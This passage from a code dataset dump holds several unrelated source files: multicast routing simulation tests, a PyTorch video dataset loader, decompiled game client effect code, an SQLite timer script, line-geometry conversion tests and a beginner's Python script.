n_t._tree_ifs[sn]\n\n            setattr(n_sn, fname, _msg_missfire)\n\n        self.schedule_action(time, _set_missfire)\n\n    def assert_routers(self, tests) -> dict:\n        \"\"\"\n        performs asserts for interfaces and state machines\n\n        and places entities in the returned dict in the following format\n\n        entries in tests must be in either\n        [<router>, <subnet>,\n         Downstream, NoInfoState|Winner|Loser, NoInfoState|Prunned|PrunnedPending|None]\n        or\n        [<router>, <subnet>,\n         Upstream, NoInfoState|Winner|Loser, Forward|Prunned|AckPending|None]\n\n        rts[S] for source\n        rts[sn1] for subnet 1, which are loaded as needed by parameter t[1]\n        rts[A] for routers\n        rts[A_t] for pim tree\n        rts[A_sn1] for tree interface\n        \"\"\"\n\n        rts = dict()\n        S = rts['S'] = NetworkEntity.get('S')\n        try:\n            for t in tests:\n                # get subnet\n                sn_name = t[1]\n                if sn_name not in rts:\n                    rts[sn_name] = NetworkEntity.get(sn_name)\n                sn = rts[sn_name]\n\n                # use: rts['A']\n                r_name = t[0]\n                r = rts[r_name] = NetworkEntity.get(r_name)._daemons[\n                    Router.NAME]\n\n                # use: rts['A_t']\n                r_t = r.get_tree(TreeId(S, 'g1'))\n                rts[\"{}_t\".format(r_name)] = r_t\n\n                r_sn = r_t._tree_ifs[sn]\n\n                expected_if_type = t[2]\n                self.assertIsInstance(\n                    r_sn._if_state, expected_if_type,\n                    \"{}_{} is not instanceof {}\".format(r_name, sn_name, t[2]))\n\n                # use: rts['A_sn1']\n                rts[\"{}_{}\".format(r_name, sn_name)] = r_sn\n\n                expected_assert_state = t[3]\n                expected_prune_state = t[4]\n\n                # winner/loser/None\n                if expected_assert_state:\n                    self.assertIsInstance(\n                        r_sn._assert_state, expected_assert_state,\n                        \"{}_{} \\nis in state {}\\n but should be in {}\".format(\n                            r_name, sn_name, r_sn._assert_state,\n                            expected_assert_state))\n\n                # Forward|Prunned|AckPending|None if Upstream\n                # NoInfoState|Prunned|PrunnedPending|None if Downstream\n\n                if expected_prune_state:\n                    self.assertIsInstance(\n                        r_sn._if_state._state, expected_prune_state,\n                        \"{}_{} \\n\\tis in state {}\\n\\tbut should be in {}\".format(\n                            r_name, sn_name, r_sn._if_state._state,\n                            expected_prune_state))\n\n        except Exception as e:\n            # better debug info\n            ret = [str(cell) for cell in t]\n            #sn = sn.__name__\n            print(ret)\n\n            raise e\n\n        return rts\n\n    def test_1_1(self):\n        # Assemble\n        self.set_topo([('S', ('sn0', 1)), ('A', ('sn0', 1)), ])\n\n        # Act\n        NetworkEvent.join_node_link(40, \"A\", 'sn1', 1)\n        self.sim.run()\n\n        # Assert\n        rts = self.assert_routers([\n            ('A', 'sn0', Upstream, assert_sm.NoInfoState, up_sm.ForwardState),\n            ('A', 'sn1', Downstream, None, None),\n        ])\n\n    def test_1_2(self):\n        # Assemble\n        self.set_topo([('S', ('sn0', 1)), ('A', ('sn0', 1), ('sn1', 1)), ])\n\n        # Act\n        NetworkEvent.join_node_link(40, \"C\", 'sn1', 1)\n        self.sim.run()\n\n        # Assert\n        rts = self.assert_routers([\n            ('A', 'sn1', Downstream, assert_sm.NoInfoState, down_sm.NoInfoState\n             ),\n            ('C', 'sn1', Upstream, assert_sm.NoInfoState, up_sm.ForwardState),\n        ])\n\n    def test_1_3(self):\n        # Assemble\n        self.set_topo([\n            ('S', ('sn0', 1)),\n            ('A', ('sn0', 1), ('sn1', 1)),\n            ('B', ('sn0', 2), 
('sn1', 1)),\n ])\n\n for n in ('A', 'B'):\n self.set_members(n, False)\n\n # Act\n self.schedule_action(45, lambda: self.set_members('C', False))\n self.sim.run()\n\n # Assert\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.WinnerState,\n down_sm.PrunnedState),\n ('B', 'sn1', Downstream, assert_sm.LoserState, down_sm.NoInfoState\n ),\n ])\n\n def test_2_1(self):\n # Assemble\n self.set_topo([\n ('S', ('sn0', 1)),\n ('A', ('sn0', 1), ('sn1', 1)),\n ('C', ('sn1', 1), ('sn2', 1)),\n ('E', ('sn2', 1)),\n ])\n\n for n in ('A', 'C'):\n self.set_members(n, False)\n\n # Act\n NetworkEvent.disjoin_node_link(40.0, 'E', 'sn2')\n self.sim.run()\n\n # Assert\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.NoInfoState,\n down_sm.PrunnedState),\n ('C', 'sn1', Upstream, assert_sm.NoInfoState, up_sm.PrunedState),\n ('C', 'sn2', Downstream, assert_sm.NoInfoState, down_sm.NoInfoState\n ),\n ])\n\n self.assertEqual(len(rts['C_t'].olist), 0, \"Olist should be empty\")\n\n def test_2_2(self):\n # Assemble\n self.set_topo([\n ('S', ('sn0', 1)),\n ('A', ('sn0', 1), ('sn1', 1)),\n ('C', ('sn1', 1), ('sn2', 1)),\n ])\n for r in ('A', 'C'):\n self.set_members(r, False)\n\n # Act\n NetworkEvent.join_node_link(40.0, 'E', 'sn2')\n self.sim.run()\n\n # Assert\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.NoInfoState,\n down_sm.PrunnedState),\n ('C', 'sn1', Upstream, assert_sm.NoInfoState, up_sm.PrunedState),\n ('C', 'sn2', Downstream, assert_sm.NoInfoState, down_sm.NoInfoState\n ),\n ('E', 'sn2', Upstream, None, up_sm.ForwardState),\n ])\n\n self.assertEqual(\n len(rts['C_t'].olist), 1, \"Olist should have 1 element (router C)\")\n\n def test_2_3(self):\n # Assemble\n self.set_topo([\n ('S', ('sn0', 1)),\n ('A', ('sn0', 1), ('sn1', 3)),\n ('B', ('sn0', 2), ('sn1', 3)),\n ])\n\n # Act\n\n def _assert():\n self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.WinnerState,\n down_sm.PrunnedState),\n ('B', 'sn1', Downstream, assert_sm.LoserState,\n down_sm.NoInfoState),\n ('C', 'sn1', Upstream, None, up_sm.ForwardState),\n ])\n\n NetworkEvent.join_node_link(40, 'C', 'sn1', 1)\n\n # at 50 seconds a new data msg is sent\n # assert that A is prunned\n self.schedule_action(48, _assert)\n self.schedule_action(52, _assert)\n\n self.sim.run()\n\n # Assert\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.WinnerState, down_sm.NoInfoState\n ),\n ('B', 'sn1', Downstream, assert_sm.LoserState, down_sm.NoInfoState\n ),\n ])\n\n self.assertEqual(\n len(rts['A_t'].olist), 1, \"Olist should have 1 interface\")\n\n def test_2_4(self):\n # Assemble\n self.set_topo([\n ('S', ('sn0', 1)),\n ('A', ('sn0', 1), ('sn1', 3)),\n ('B', ('sn0', 2), ('sn1', 3)),\n ])\n\n # Act\n # assert that A in winner AND it's prunned\n def _assert():\n self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.WinnerState,\n down_sm.NoInfoState),\n ('B', 'sn1', Downstream, assert_sm.LoserState,\n down_sm.NoInfoState),\n ('C', 'sn1', Upstream, None, up_sm.ForwardState),\n ])\n\n # at 85 seconds the state refresh msg is sent\n NetworkEvent.join_node_link(110, 'C', 'sn1', 1)\n self.schedule_action(115, _assert)\n\n self.sim.run()\n\n # Assert\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.WinnerState, down_sm.NoInfoState\n ),\n ('B', 'sn1', Downstream, assert_sm.LoserState, down_sm.NoInfoState\n ),\n ])\n\n self.assertEqual(\n len(rts['A_t'].olist), 1, \"Olist should have 1 interface\")\n\n def test_3_1(self):\n # Assemble\n self.set_topo([\n ('S', ('sn0', 1)),\n 
('A', ('sn0', 1), ('sn1', 1)),\n ('B', ('sn0', 1), ('sn1', 1)),\n ])\n\n # Act\n NetworkEvent.disjoin_node_link(40.0, 'A', 'sn0')\n self.sim.run()\n\n # Assert\n rts = self.assert_routers([\n ('A', 'sn1', Upstream, None, up_sm.ForwardState),\n ('B', 'sn1', Downstream, None, down_sm.NoInfoState),\n ])\n\n self.assertEqual(\n len(rts['B_t'].olist), 1, \"Olist should have 1 element (router A)\")\n\n def test_3_2(self):\n # Assemble\n self.set_topo([\n ('S', ('sn0', 1)),\n ('A', ('sn1', 1)),\n ('B', ('sn0', 1), ('sn1', 1)),\n ])\n\n # Act\n NetworkEvent.join_node_link(40.0, 'A', 'sn0')\n self.sim.run()\n\n # Assert\n rts = self.assert_routers([\n ('A', 'sn0', Upstream, None, None),\n ('A', 'sn1', Downstream, assert_sm.LoserState, down_sm.NoInfoState\n ),\n ('B', 'sn1', Downstream, assert_sm.WinnerState,\n down_sm.PrunnedState),\n ])\n\n def test_3_3(self):\n # Assemble\n self.set_topo([\n ('S', ('sn0', 1)),\n ('A', ('sn0', 1), ('sn1', 1)),\n ('B', ('sn0', 1), ('sn1', 1)),\n ])\n\n self.set_members('A', False)\n\n # Act\n NetworkEvent.disjoin_node_link(40.0, 'A', 'sn0')\n self.sim.run()\n\n # Assert\n rts = self.assert_routers([\n ('A', 'sn1', Upstream, None, up_sm.PrunedState),\n ('B', 'sn1', Downstream, None, down_sm.PrunnedState),\n ])\n\n self.assertEqual(len(rts['B_t'].olist), 0, \"Olist should be empty\")\n\n def test_4_1(self):\n # Assemble\n self.set_topo([\n ('S', ('sn0', 1)),\n ('A', ('sn0', 1), ('sn1', 2)),\n ('B', ('sn0', 2), ('sn1', 3)),\n ])\n\n # Act\n NetworkEvent.change_interface_cost(40, 'A', 'sn0', 3)\n\n # note this is the exact opposite of Assert section below\n def assert_A_is_winner():\n self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.WinnerState,\n down_sm.PrunnedState),\n ('B', 'sn1', Downstream, assert_sm.LoserState,\n down_sm.NoInfoState),\n ])\n\n self.schedule_action(41, assert_A_is_winner)\n\n self.sim.run()\n\n # Assert\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.LoserState, down_sm.NoInfoState\n ),\n ('B', 'sn1', Downstream, assert_sm.WinnerState,\n down_sm.PrunnedState),\n ])\n\n self.assertEqual(len(rts['B_t'].olist), 0, \"Olist should be empty\")\n\n def test_4_2(self):\n def pre_cost_ch_assert():\n self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.WinnerState,\n down_sm.NoInfoState),\n ('B', 'sn1', Downstream, assert_sm.LoserState,\n down_sm.NoInfoState),\n ])\n\n def pos_cost_ch_assert():\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.LoserState,\n down_sm.NoInfoState),\n ('B', 'sn1', Downstream, assert_sm.NoInfoState,\n down_sm.NoInfoState),\n ])\n\n # Assemble\n self.set_topo([\n ('S', ('sn0', 1)),\n ('A', ('sn0', 1), ('sn1', 2)),\n ('B', ('sn0', 2), ('sn1', 3)),\n ('C', ('sn1', 3)),\n ])\n\n # Act\n self.schedule_action(39, pre_cost_ch_assert)\n NetworkEvent.change_interface_cost(40, 'A', 'sn0', 3)\n self.schedule_action(41, pos_cost_ch_assert)\n\n self.sim.run()\n\n # Assert\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.LoserState, down_sm.NoInfoState),\n ('B', 'sn1', Downstream, assert_sm.NoInfoState, down_sm.NoInfoState),\n ])\n\n def test_5_1_1(self):\n # Assemble\n self.set_topo([\n ('S', ('sn0', 1)),\n ('A', ('sn0', 1), ('sn1', 1)),\n ('C', ('sn1', 1)),\n ('D', ('sn1', 1)),\n ])\n\n self._schedule_missfire(26, \"D\", \"sn1\", \"send_join\")\n\n\n def _assert_prunned_pending():\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, None, down_sm.PrunePendingState),\n ('C', 'sn1', Upstream, None, up_sm.PrunedState),\n ('D', 'sn1', Upstream, None, 
up_sm.ForwardState),\n ])\n def _assert_prunned():\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, None, down_sm.PrunnedState),\n ('C', 'sn1', Upstream, None, up_sm.PrunedState),\n ('D', 'sn1', Upstream, None, up_sm.ForwardState),\n ])\n def _assert_noinfo():\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, None, down_sm.NoInfoState),\n ('C', 'sn1', Upstream, None, up_sm.PrunedState),\n ('D', 'sn1', Upstream, None, up_sm.ForwardState),\n ])\n\n self.schedule_action(40.1, _assert_prunned_pending)\n self.schedule_action(43.1, _assert_prunned)\n self.schedule_action(45, _assert_prunned)\n self.schedule_action(46, _assert_noinfo)\n self.schedule_action(math.inf, _assert_noinfo)\n\n # Act\n self.set_members('C', False, 40)\n self.sim.run()\n\n def test_5_1_2(self):\n # Assemble\n self.set_topo([\n ('S', ('sn0', 1)),\n ('A', ('sn0', 1), ('sn1', 1)),\n ('C', ('sn1', 1)),\n ('D', ('sn1', 1)),\n ])\n\n self._schedule_missfire(26, \"D\", \"sn1\", \"send_join\") # 1st Prune\n self._schedule_missfire(44, \"D\", \"sn1\", \"send_join\") # PruneEcho\n\n def _assert_prunned_pending():\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, None, down_sm.PrunePendingState),\n ('C', 'sn1', Upstream, None, up_sm.PrunedState),\n ('D', 'sn1', Upstream, None, up_sm.ForwardState),\n ])\n def _assert_prunned():\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, None, down_sm.PrunnedState),\n ('C', 'sn1', Upstream, None, up_sm.PrunedState),\n ('D', 'sn1', Upstream, None, up_sm.ForwardState),\n ])\n def _assert_noinfo():\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, None, down_sm.NoInfoState),\n ('C', 'sn1', Upstream, None, up_sm.PrunedState),\n ('D', 'sn1', Upstream, None, up_sm.ForwardState),\n ])\n\n self.schedule_action(40.1, _assert_prunned_pending)\n self.schedule_action(43.1, _assert_prunned)\n self.schedule_action(45, _assert_prunned) # after 1st prune\n self.schedule_action(46, _assert_prunned) # after PruneEcho\n self.schedule_action(88, _assert_noinfo) # after StateRefresh\n self.schedule_action(math.inf, _assert_noinfo)\n\n # Act\n self.set_members('C', False, 40)\n self.sim.run()\n\n\n def test_5_2_1(self):\n # Assemble\n self.set_topo([\n ('S', ('sn0', 1)),\n ('A', ('sn0', 1), ('sn1', 1)),\n ('B', ('sn0', 2), ('sn1', 1)),\n ('C', ('sn1', 1)),\n ])\n\n # Act\n self._schedule_missfire(10, \"A\", \"sn1\", \"send_assert\")\n\n def _assert():\n self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.WinnerState,\n down_sm.NoInfoState),\n ('B', 'sn1', Downstream, assert_sm.LoserState,\n down_sm.NoInfoState),\n ('C', 'sn1', Upstream, None, up_sm.ForwardState),\n ])\n\n # at 50 seconds a new data msg is sent\n # assert that A is prunned\n self.schedule_action(48, _assert)\n self.schedule_action(52, _assert)\n\n self.sim.run()\n\n # Assert\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.WinnerState, down_sm.NoInfoState),\n ('B', 'sn1', Downstream, assert_sm.LoserState, down_sm.NoInfoState),\n ])\n\n self.assertEqual(\n len(rts['A_t'].olist), 1, \"Olist should have 1 interface\")\n\n def test_5_2_2(self):\n def _assert_B_in_looser():\n self.assert_routers([\n ('A', 'sn1', Upstream, None, up_sm.ForwardState),\n ('B', 'sn1', Downstream, assert_sm.LoserState,\n down_sm.NoInfoState),\n ('C', 'sn1', Upstream, None, up_sm.ForwardState),\n ])\n\n def _assert_B_in_noinfo():\n self.assert_routers([\n ('A', 'sn1', Upstream, None, up_sm.ForwardState),\n ('B', 'sn1', Downstream, assert_sm.NoInfoState,\n down_sm.NoInfoState),\n ('C', 'sn1', Upstream, None, 
up_sm.ForwardState),\n ])\n\n # Assemble\n self.set_topo([\n ('S', ('sn0', 1)),\n ('A', ('sn0', 1), ('sn1', 1)),\n ('B', ('sn0', 2), ('sn1', 1)),\n ('C', ('sn1', 1)),\n ])\n\n # Act\n self._schedule_missfire(39, \"A\", \"sn1\", \"send_assert_cancel\")\n NetworkEvent.disjoin_node_link(40, \"A\", 'sn0')\n\n self.schedule_action(41, _assert_B_in_looser)\n\n # the \"+5\" is just a safety margin\n self.schedule_action(25 + 180 - 5, _assert_B_in_looser)\n self.schedule_action(25 + 180 + 5, _assert_B_in_noinfo)\n\n self.sim.run()\n\n # Assert\n _assert_B_in_noinfo()\n\n\nif __name__ == \"__main__\":\n #import sys;sys.argv = ['', 'Test.testName']\n unittest.main()\n","sub_path":"src/tests/test_pim.py","file_name":"test_pim.py","file_ext":"py","file_size_in_byte":21852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"602252358","text":"#name = input('Enter file:')\nhandle = open(\"Ch1.txt\", 'r')\ncounts = dict()\nfor line in handle:\n words = line.split()\n for word in words:\n counts[word] = counts.get(word, 0) + 1\nbigcount = None\nbigword = None\nfor word, count in list(counts.items()):\n if bigcount is None or count > bigcount:\n bigword = word\n bigcount = count\nprint(bigword, bigcount)\n\nprint(\"Raising to a power \", 2 ** 4)\n\nprint(\"Quotient \" , 7 // 3) # is 2, the quotient\nprint(\"Remainder\" , 7%3) # is 1, the remainder\n\n\n#ask user for input\ninp = input(\"Enter something: \")\nprint(\"This is what you entered: \" + inp)","sub_path":"P4E_Ch1/P4E_Ch1.py","file_name":"P4E_Ch1.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"635514124","text":"import torch.utils.data as data\n\nfrom PIL import Image\nimport os\nimport os.path\nimport numpy as np\nfrom numpy.random import randint\nimport time\nimport lintel\n\nDEBUG_FLAG = False\n\n\nclass VideoRecord(object):\n\n def __init__(self, row):\n self._data = row\n\n @property\n def path(self):\n return self._data[0]\n\n @property\n def num_frames(self):\n return int(self._data[1])\n\n @property\n def label(self):\n return int(self._data[2])\n\n\nclass TSNDataSet(data.Dataset):\n\n def __init__(self, root_path, list_file,\n num_segments=3, new_length=1,\n image_tmpl='img_{:05d}.jpg', transform=None,\n force_grayscale=False, random_shift=True, test_mode=False,\n read_mode='img', skip=0):\n\n self.root_path = root_path\n self.list_file = list_file\n self.num_segments = num_segments\n self.new_length = new_length\n self.image_tmpl = image_tmpl\n self.transform = transform\n self.random_shift = random_shift\n self.test_mode = test_mode\n self.read_mode = read_mode\n self.skip = skip\n\n self.need_length = new_length * (skip + 1) - skip\n\n self._parse_list()\n\n def _load_image(self, directory, idx):\n return [Image.open(os.path.join(directory, self.image_tmpl.format(idx))).convert('RGB')]\n\n def _load_image_from_video(self, video_data, p):\n return [Image.fromarray(video_data[p])]\n\n def _parse_list(self):\n self.video_list = [VideoRecord(x.strip().split(' '))\n for x in open(self.list_file)]\n\n def _sample_indices(self, record):\n \"\"\"\n\n :param record: VideoRecord\n :return: list\n \"\"\"\n\n average_duration = (record.num_frames -\n self.need_length + 1) // self.num_segments\n if average_duration > 0:\n offsets = np.multiply(list(range(self.num_segments)), average_duration) + \\\n randint(average_duration, size=self.num_segments)\n elif record.num_frames > self.need_length:\n offsets = 
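# Editor's note: a minimal, hedged rewrite of the word-frequency scan in the
# P4E_Ch1.py record above using collections.Counter; "Ch1.txt" is the same
# assumed input file, and this sketch is illustrative, not part of the record.
from collections import Counter

with open("Ch1.txt") as handle:
    counts = Counter(word for line in handle for word in line.split())

# most_common(1) yields [(word, count)] for the top word, matching the manual
# bigword/bigcount loop in the original snippet.
print(counts.most_common(1))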
np.sort(randint(record.num_frames -\n self.need_length + 1, size=self.num_segments))\n else:\n offsets = np.zeros((self.num_segments,))\n return offsets\n\n def _get_val_indices(self, record):\n if record.num_frames > self.num_segments + self.need_length - 1:\n tick = (record.num_frames - self.need_length + 1) / \\\n float(self.num_segments)\n offsets = np.array([int(tick / 2.0 + tick * x)\n for x in range(self.num_segments)])\n else:\n offsets = np.zeros((self.num_segments,))\n return offsets\n\n def _get_test_indices(self, record):\n\n return self._get_val_indices(record)\n\n def __getitem__(self, index):\n record = self.video_list[index]\n\n if not self.test_mode:\n segment_indices = self._sample_indices(\n record) if self.random_shift else self._get_val_indices(record)\n else:\n segment_indices = self._get_test_indices(record)\n\n return self.get(record, segment_indices)\n\n def _get_full_indices(self, indices, num_frames):\n full_indices = []\n for seg_ind in indices:\n p = int(seg_ind)\n for i in range(self.new_length):\n full_indices.append(p)\n if p < num_frames - 1:\n p += 1 + self.skip\n if p >= num_frames:\n p = num_frames - 1\n full_indices = list(set(full_indices))\n full_indices.sort()\n return full_indices\n\n def get(self, record, indices):\n\n images = list()\n debug_info = []\n if self.read_mode == 'video':\n video_data = {}\n t1 = time.time()\n finish_flag = False\n full_indices = self._get_full_indices(indices, record.num_frames)\n with open(os.path.join(self.root_path, record.path), 'rb') as f:\n enc_vid = f.read()\n df, w, h = lintel.loadvid_frame_nums(\n enc_vid, frame_nums=full_indices)\n df = np.reshape(df, (len(full_indices), h, w, 3))\n for i in range(len(full_indices)):\n video_data[full_indices[i]] = df[i]\n t2 = time.time()\n debug_info.append('read video: {:.4f}s'.format(t2 - t1))\n\n t1 = time.time()\n for seg_ind in indices:\n p = int(seg_ind)\n for i in range(self.new_length):\n if self.read_mode == 'video':\n seg_imgs = self._load_image_from_video(video_data, p)\n else:\n seg_imgs = self._load_image(\n os.path.join(self.root_path, record.path), p)\n images.extend(seg_imgs)\n if p < record.num_frames - 1:\n p += 1 + self.skip\n if p >= record.num_frames:\n p = record.num_frames - 1\n t2 = time.time()\n debug_info.append('load image: {:.4f}s'.format(t2 - t1))\n\n t1 = time.time()\n process_data = self.transform(images)\n t2 = time.time()\n debug_info.append('transform data: {:.4f}s'.format(t2 - t1))\n if DEBUG_FLAG:\n print(debug_info)\n return process_data, record.label\n\n def __len__(self):\n return len(self.video_list)\n","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"33204950","text":"# Python bytecode 2.7 (decompiled from Python 2.7)\n# Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\eve\\client\\script\\environment\\effects\\impactEffect.py\nONESHOT_EVENTS = ['shieldboost', 'shieldhardening']\n__author__ = 'stevem'\nfrom eve.client.script.environment.effects.GenericEffect import GenericEffect, STOP_REASON_DEFAULT\n\nclass ImpactEffect(GenericEffect):\n __guid__ = 'effects.ImpactEffect'\n\n def Start(self, duration):\n shipBall = self.GetEffectShipBall()\n model = getattr(shipBall, 'model', None)\n if model is not None:\n if self.animationName is not None:\n self.AddSoundToEffect(scaler=4.0, model=model)\n model.SetImpactAnimation(self.animationName, True, 
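# Editor's note: a self-contained sketch of the TSN-style segment sampling in
# _sample_indices above, with illustrative values (30 frames, 3 segments,
# need_length 1); not part of the original dataset.py record.
import numpy as np
from numpy.random import randint

num_segments, need_length, num_frames = 3, 1, 30
average_duration = (num_frames - need_length + 1) // num_segments  # 10 here
# One random offset inside each of the 3 equal chunks, e.g. array([4, 12, 25]).
offsets = np.multiply(list(range(num_segments)), average_duration) + \
    randint(average_duration, size=num_segments)
print(offsets)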
self.duration / 1000.0)\n event = 'ship_effect_%s_play' % self.animationName\n self.SendAudioEvent(event)\n return\n\n def Stop(self, reason=STOP_REASON_DEFAULT):\n shipBall = self.GetEffectShipBall()\n model = getattr(shipBall, 'model', None)\n if model is not None:\n if self.animationName is not None:\n model.SetImpactAnimation(self.animationName, False, self.duration / 1000.0)\n if self.animationName not in ONESHOT_EVENTS:\n event = 'ship_effect_%s_stop' % self.animationName\n self.SendAudioEvent(event)\n if self.observer is not None:\n self.observer = None\n return\n\n def Repeat(self, duration):\n shipBall = self.GetEffectShipBall()\n model = getattr(shipBall, 'model', None)\n if model is not None:\n if self.animationName is not None:\n model.SetImpactAnimation(self.animationName, True, self.duration / 1000.0)\n if self.animationName in ONESHOT_EVENTS:\n event = 'ship_effect_%s_play' % self.animationName\n self.SendAudioEvent(event)\n return","sub_path":"client/eve/client/script/environment/effects/impactEffect.py","file_name":"impactEffect.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"396406647","text":"import sqlite3\nimport time\n\ndef update_base():\n conn = sqlite3.connect('USERS.sqlite')\n cursor = conn.cursor()\n\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM Us\")\n rows = cur.fetchall()\n\n for i in range(len(rows)):\n rows[i] = list(rows[i])\n\n conn.commit()\n cursor.close()\n conn.close()\n return rows\n\ndef time_changes():\n while True:\n conn = sqlite3.connect('USERS.sqlite')\n cursor = conn.cursor()\n users = update_base()\n for user in users:\n if int(user[3]) > -10:\n cursor.execute('UPDATE Us SET bonus_time=' + '\"' +str(int(user[3]) - 1)+ '\"' + ' WHERE id=' + str(user[0]))\n if int(user[4]) > -10:\n cursor.execute('UPDATE Us SET work_time=' + '\"' +str(int(user[4]) - 1) + '\"' +' WHERE id=' + str(user[0]))\n cursor.close()\n conn.commit()\n conn.close()\n time.sleep(1)\n\ntime_changes()","sub_path":"BOT/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"177349594","text":"import math, numpy, random, cv2\n\nheight = 300\nwidth = 400\n\ndef _norm_to_pts(rho, theta):\n if abs(theta) < math.pi/180:\n pt1 = (int(math.cos(theta)*rho), 0)\n pt2 = (int(math.cos(theta)*rho), height)\n else: \n m = -1 / math.tan(theta)\n b = rho / math.sin(theta)\n pt1 = (0, int(b))\n pt2 = (width, int(m * width + b))\n (_, pt1, pt2) = cv2.clipLine((0, 0, width, height), pt1, pt2)\n return (pt1, pt2)\n\ndef _pts_to_norm(x1, y1, x2, y2):\n # expressions for rho and theta calculated with mathematica\n rho = 0\n theta = 0\n if x1 == x2 and y1 == y2:\n print(\"Unable to convert to normal form. 
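# Editor's note: the UPDATE statements in the timer.py record above are built
# by string concatenation; the sketch below shows the equivalent query with
# sqlite3 parameter binding. Table and column names (Us, bonus_time, id) come
# from the snippet itself; the values are illustrative.
import sqlite3

conn = sqlite3.connect('USERS.sqlite')
cursor = conn.cursor()
new_bonus, user_id = 5, 1  # placeholder values for the sketch
cursor.execute('UPDATE Us SET bonus_time = ? WHERE id = ?',
               (str(new_bonus), user_id))
conn.commit()
conn.close()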
Points too close together.\")\n print(\"coordinates: \" + str((x1, y1)) + str((x2, y2)))\n (rho, theta) = (-1, -1) \n elif y1 == y2:\n (rho, theta) = ((y1 + y2)/2, math.pi/2)\n elif x1 == x2:\n (rho, theta) = ((x1 + x2)/2, 0)\n else:\n rho = (x1 * y2 - y1 * x2) / ((y2 - y1) * math.sqrt(1+((x1 - x2)/(y2 - y1))**2))\n theta = math.atan((x1-x2)/(y2-y1))\n if theta < 0:\n theta = theta + math.pi\n rho = -1 * rho\n return (rho, theta)\n\nprint(\"phase 1\")\nfor _ in range(10):\n (rho, theta) = (random.random()*height, random.random() * math.pi/2)\n ((x1, y1), (x2, y2)) = _norm_to_pts(rho, theta)\n (rho_, theta_) = _pts_to_norm(x1, y1, x2, y2)\n try:\n assert(abs(rho - rho_) <= 2)\n except Exception as e:\n print('rho failed')\n print((rho, theta))\n print((rho_, theta_))\n try:\n assert(abs(theta - theta_) <= 2*math.pi/180)\n except Exception as e:\n print('theta failed')\n print((rho, theta))\n print((rho_, theta_))\n\nprint(\"phase 2\")\n\ntestpts = [(16, 293, 285, 297), (24, 212, 113, 213), (32, 142, 268, 146), (37, 78, 265, 82), (107, 293, 110, 214), (165, 83, 166, 143), (25, 235, 25, 228), (191, 146, 196, 295), (197, 295, 286, 296), (26, 211, 33, 144), (74, 214, 109, 214), (271, 147, 284, 295), (218, 147, 226, 294), (166, 290, 166, 219), (249, 220, 254, 291), (204, 80, 243, 80), (110, 212, 113, 145), (270, 147, 275, 212), (190, 81, 192, 143), (223, 215, 251, 215), (24, 213, 73, 214), (217, 147, 220, 210), (19, 292, 24, 236), (241, 110, 244, 144), (223, 216, 276, 217), (20, 260, 24, 214), (109, 293, 110, 271)]\n\nfor a in testpts:\n (x1, y1, x2, y2) = a\n (rho, theta) = _pts_to_norm(x1, y1, x2, y2)\n ((x1_, y1_), (x2_, y2_)) = _norm_to_pts(rho, theta)\n b = (x1_, y1_, x2_, y2_)\n point_diff_rms = sum(tuple(map(lambda x: abs(x)**2, numpy.subtract(a,b))))\n (rho_, theta_) = _pts_to_norm(*b)\n\n try:\n assert(abs(rho - rho_) <= 2)\n except Exception as e:\n print('rho failed')\n print((rho, theta))\n print((rho_, theta_))\n try:\n assert(abs(theta - theta_) <= math.pi/180)\n except Exception as e:\n print('theta failed')\n print((rho, theta))\n print((rho_, theta_))","sub_path":"Misc_Sources/test_line_conversions.py","file_name":"test_line_conversions.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"385407419","text":"#!/usr/bin/python3\n\"\"\"\nUnittest for Rectangle class\n\"\"\"\nimport unittest\n\nfrom io import StringIO\nfrom unittest.mock import patch\nfrom models.base import Base\nfrom models.rectangle import Rectangle\nfrom models.square import Square\n\nclass TestSquare(unittest.TestCase):\n\n def setUp(self):\n Base._Base__nb_objects = 0\n open('Rectangle.json', 'w').close()\n open('Square.json', 'w').close()\n\n def test_sq_id1(self):\n self.a0 = Square(10, 3)\n self.a3 = Square(10, 2, 9, 12)\n self.assertEqual(self.a3.id, 12)\n\n def test_sq_str1(self):\n self.a0 = Square(1, 2)\n with patch('sys.stdout', new=StringIO()) as f:\n print(self.a0)\n self.assertEqual(f.getvalue(),'[Square] (1) 2/0 - 1\\n')\n\n def test_sq_str2(self):\n self.a0 = Square(1, 2, 3)\n with patch('sys.stdout', new=StringIO()) as f:\n print(self.a0)\n self.assertEqual(f.getvalue(),'[Square] (1) 2/3 - 1\\n')\n\n def test_sq_area(self):\n self.a0 = Square(91)\n self.assertEqual(self.a0.area(), 